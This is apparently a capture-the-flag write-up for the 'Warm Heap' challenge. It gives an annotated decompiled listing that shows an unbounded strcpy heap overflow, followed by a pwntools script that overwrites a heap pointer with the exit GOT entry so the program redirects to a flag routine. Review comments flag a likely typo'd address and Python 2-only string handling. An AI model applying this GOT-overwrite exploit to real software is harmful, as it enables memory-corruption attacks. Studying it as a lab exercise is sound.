Warm Heap

Warm Heap

Binary File


void __fastcall __noreturn main(__int64 a1, char **a2, char **a3)
{
// Decompiler output of the challenge binary's entry point. It builds two
// small heap records of the form { int id; char *buf; } and fills each buf
// from stdin. The copies are unbounded, which is the defect of interest.
void *v3; // ST10_8 -- first 16-byte record: id = 1, then an 8-byte pointer slot
void *v4; // ST18_8 -- second 16-byte record: id = 2, then an 8-byte pointer slot
char s; // [rsp+20h] [rbp-1010h] -- first byte of a 4096-byte stack buffer (size taken from the fgets calls below)
unsigned __int64 v6; // [rsp+1028h] [rbp-8h] -- stack-protector canary copy

v6 = __readfsqword(0x28u); // load the canary from fs:0x28; no comparison appears below, presumably because exit() never returns
v3 = malloc(16uLL); // result unchecked: a NULL return is dereferenced on the next line
*(_DWORD *)v3 = 1;
*((_QWORD *)v3 + 1) = malloc(8uLL); // 8-byte destination buffer for the first line of input, also unchecked
v4 = malloc(16uLL);
*(_DWORD *)v4 = 2;
*((_QWORD *)v4 + 1) = malloc(8uLL); // 8-byte destination buffer for the second line of input
fgets(&s, 4096, stdin); // up to 4095 bytes of untrusted input into the stack buffer
// BUG: unbounded copy of up to 4095 bytes into an 8-byte heap allocation.
// Everything past byte 7 overruns whatever the allocator placed after that
// chunk -- with a sequential layout that is v4 and its pointer slot (TODO
// confirm against the binary's actual heap layout).
strcpy(*((char **)v3 + 1), &s);
fgets(&s, 4096, stdin);
// Writes through the pointer stored at v4+8. If the first copy overwrote
// that pointer, this second copy stores attacker-chosen bytes at an
// attacker-chosen address. Mitigation: bound both copies to the allocation
// size (e.g. snprintf(dst, 8, "%s", &s)) or allocate strlen(&s)+1, and
// check every malloc result.
strcpy(*((char **)v4 + 1), &s);
exit(0); // never returns; the canary in v6 is never compared in this listing
}

[메인 함수]
[동작 과정]
from pwn import *  # pwntools helpers (process, ELF, p64); third-party, not stdlib

# Writeup script for the heap-overflow listing above: feeds the two input lines
# the binary reads with fgets, using the unbounded first strcpy to redirect the
# second strcpy.
r = process('./warm_heap.bin')  # run the challenge binary locally; both input lines go to its stdin
elf = ELF('./warm_heap.bin')    # parsed ELF; used only for the GOT lookup in the payload
flag = 0x400826      # address as given on the page; presumably the binary's flag routine -- TODO confirm
exit_got = 0x601068d # NOTE(review): unused, and 7 hex digits looks like a typo; the payload uses elf.got['exit'] instead

# First line (first fgets): 40 filler bytes followed by the address of exit@GOT.
# The binary's unbounded strcpy carries these past the 8-byte buffer into the
# second record's pointer field (the 40-byte offset depends on the allocator's
# chunk layout -- TODO confirm against the binary).
# Second line (second fgets): the value the second strcpy then writes through
# that replaced pointer, i.e. into the GOT slot.
# NOTE(review): str and bytes are concatenated here, so this targets Python 2
# pwntools; on Python 3 the "A"*40 and "\n" literals would need a b prefix -- confirm.
payload = "A"*40 + p64(elf.got['exit']) + "\n" + p64(flag)
r.sendline(payload)   # the embedded "\n" plus sendline's newline deliver both lines at once
r.interactive()       # hand the session over so the program's output can be read
[Exploit Code]
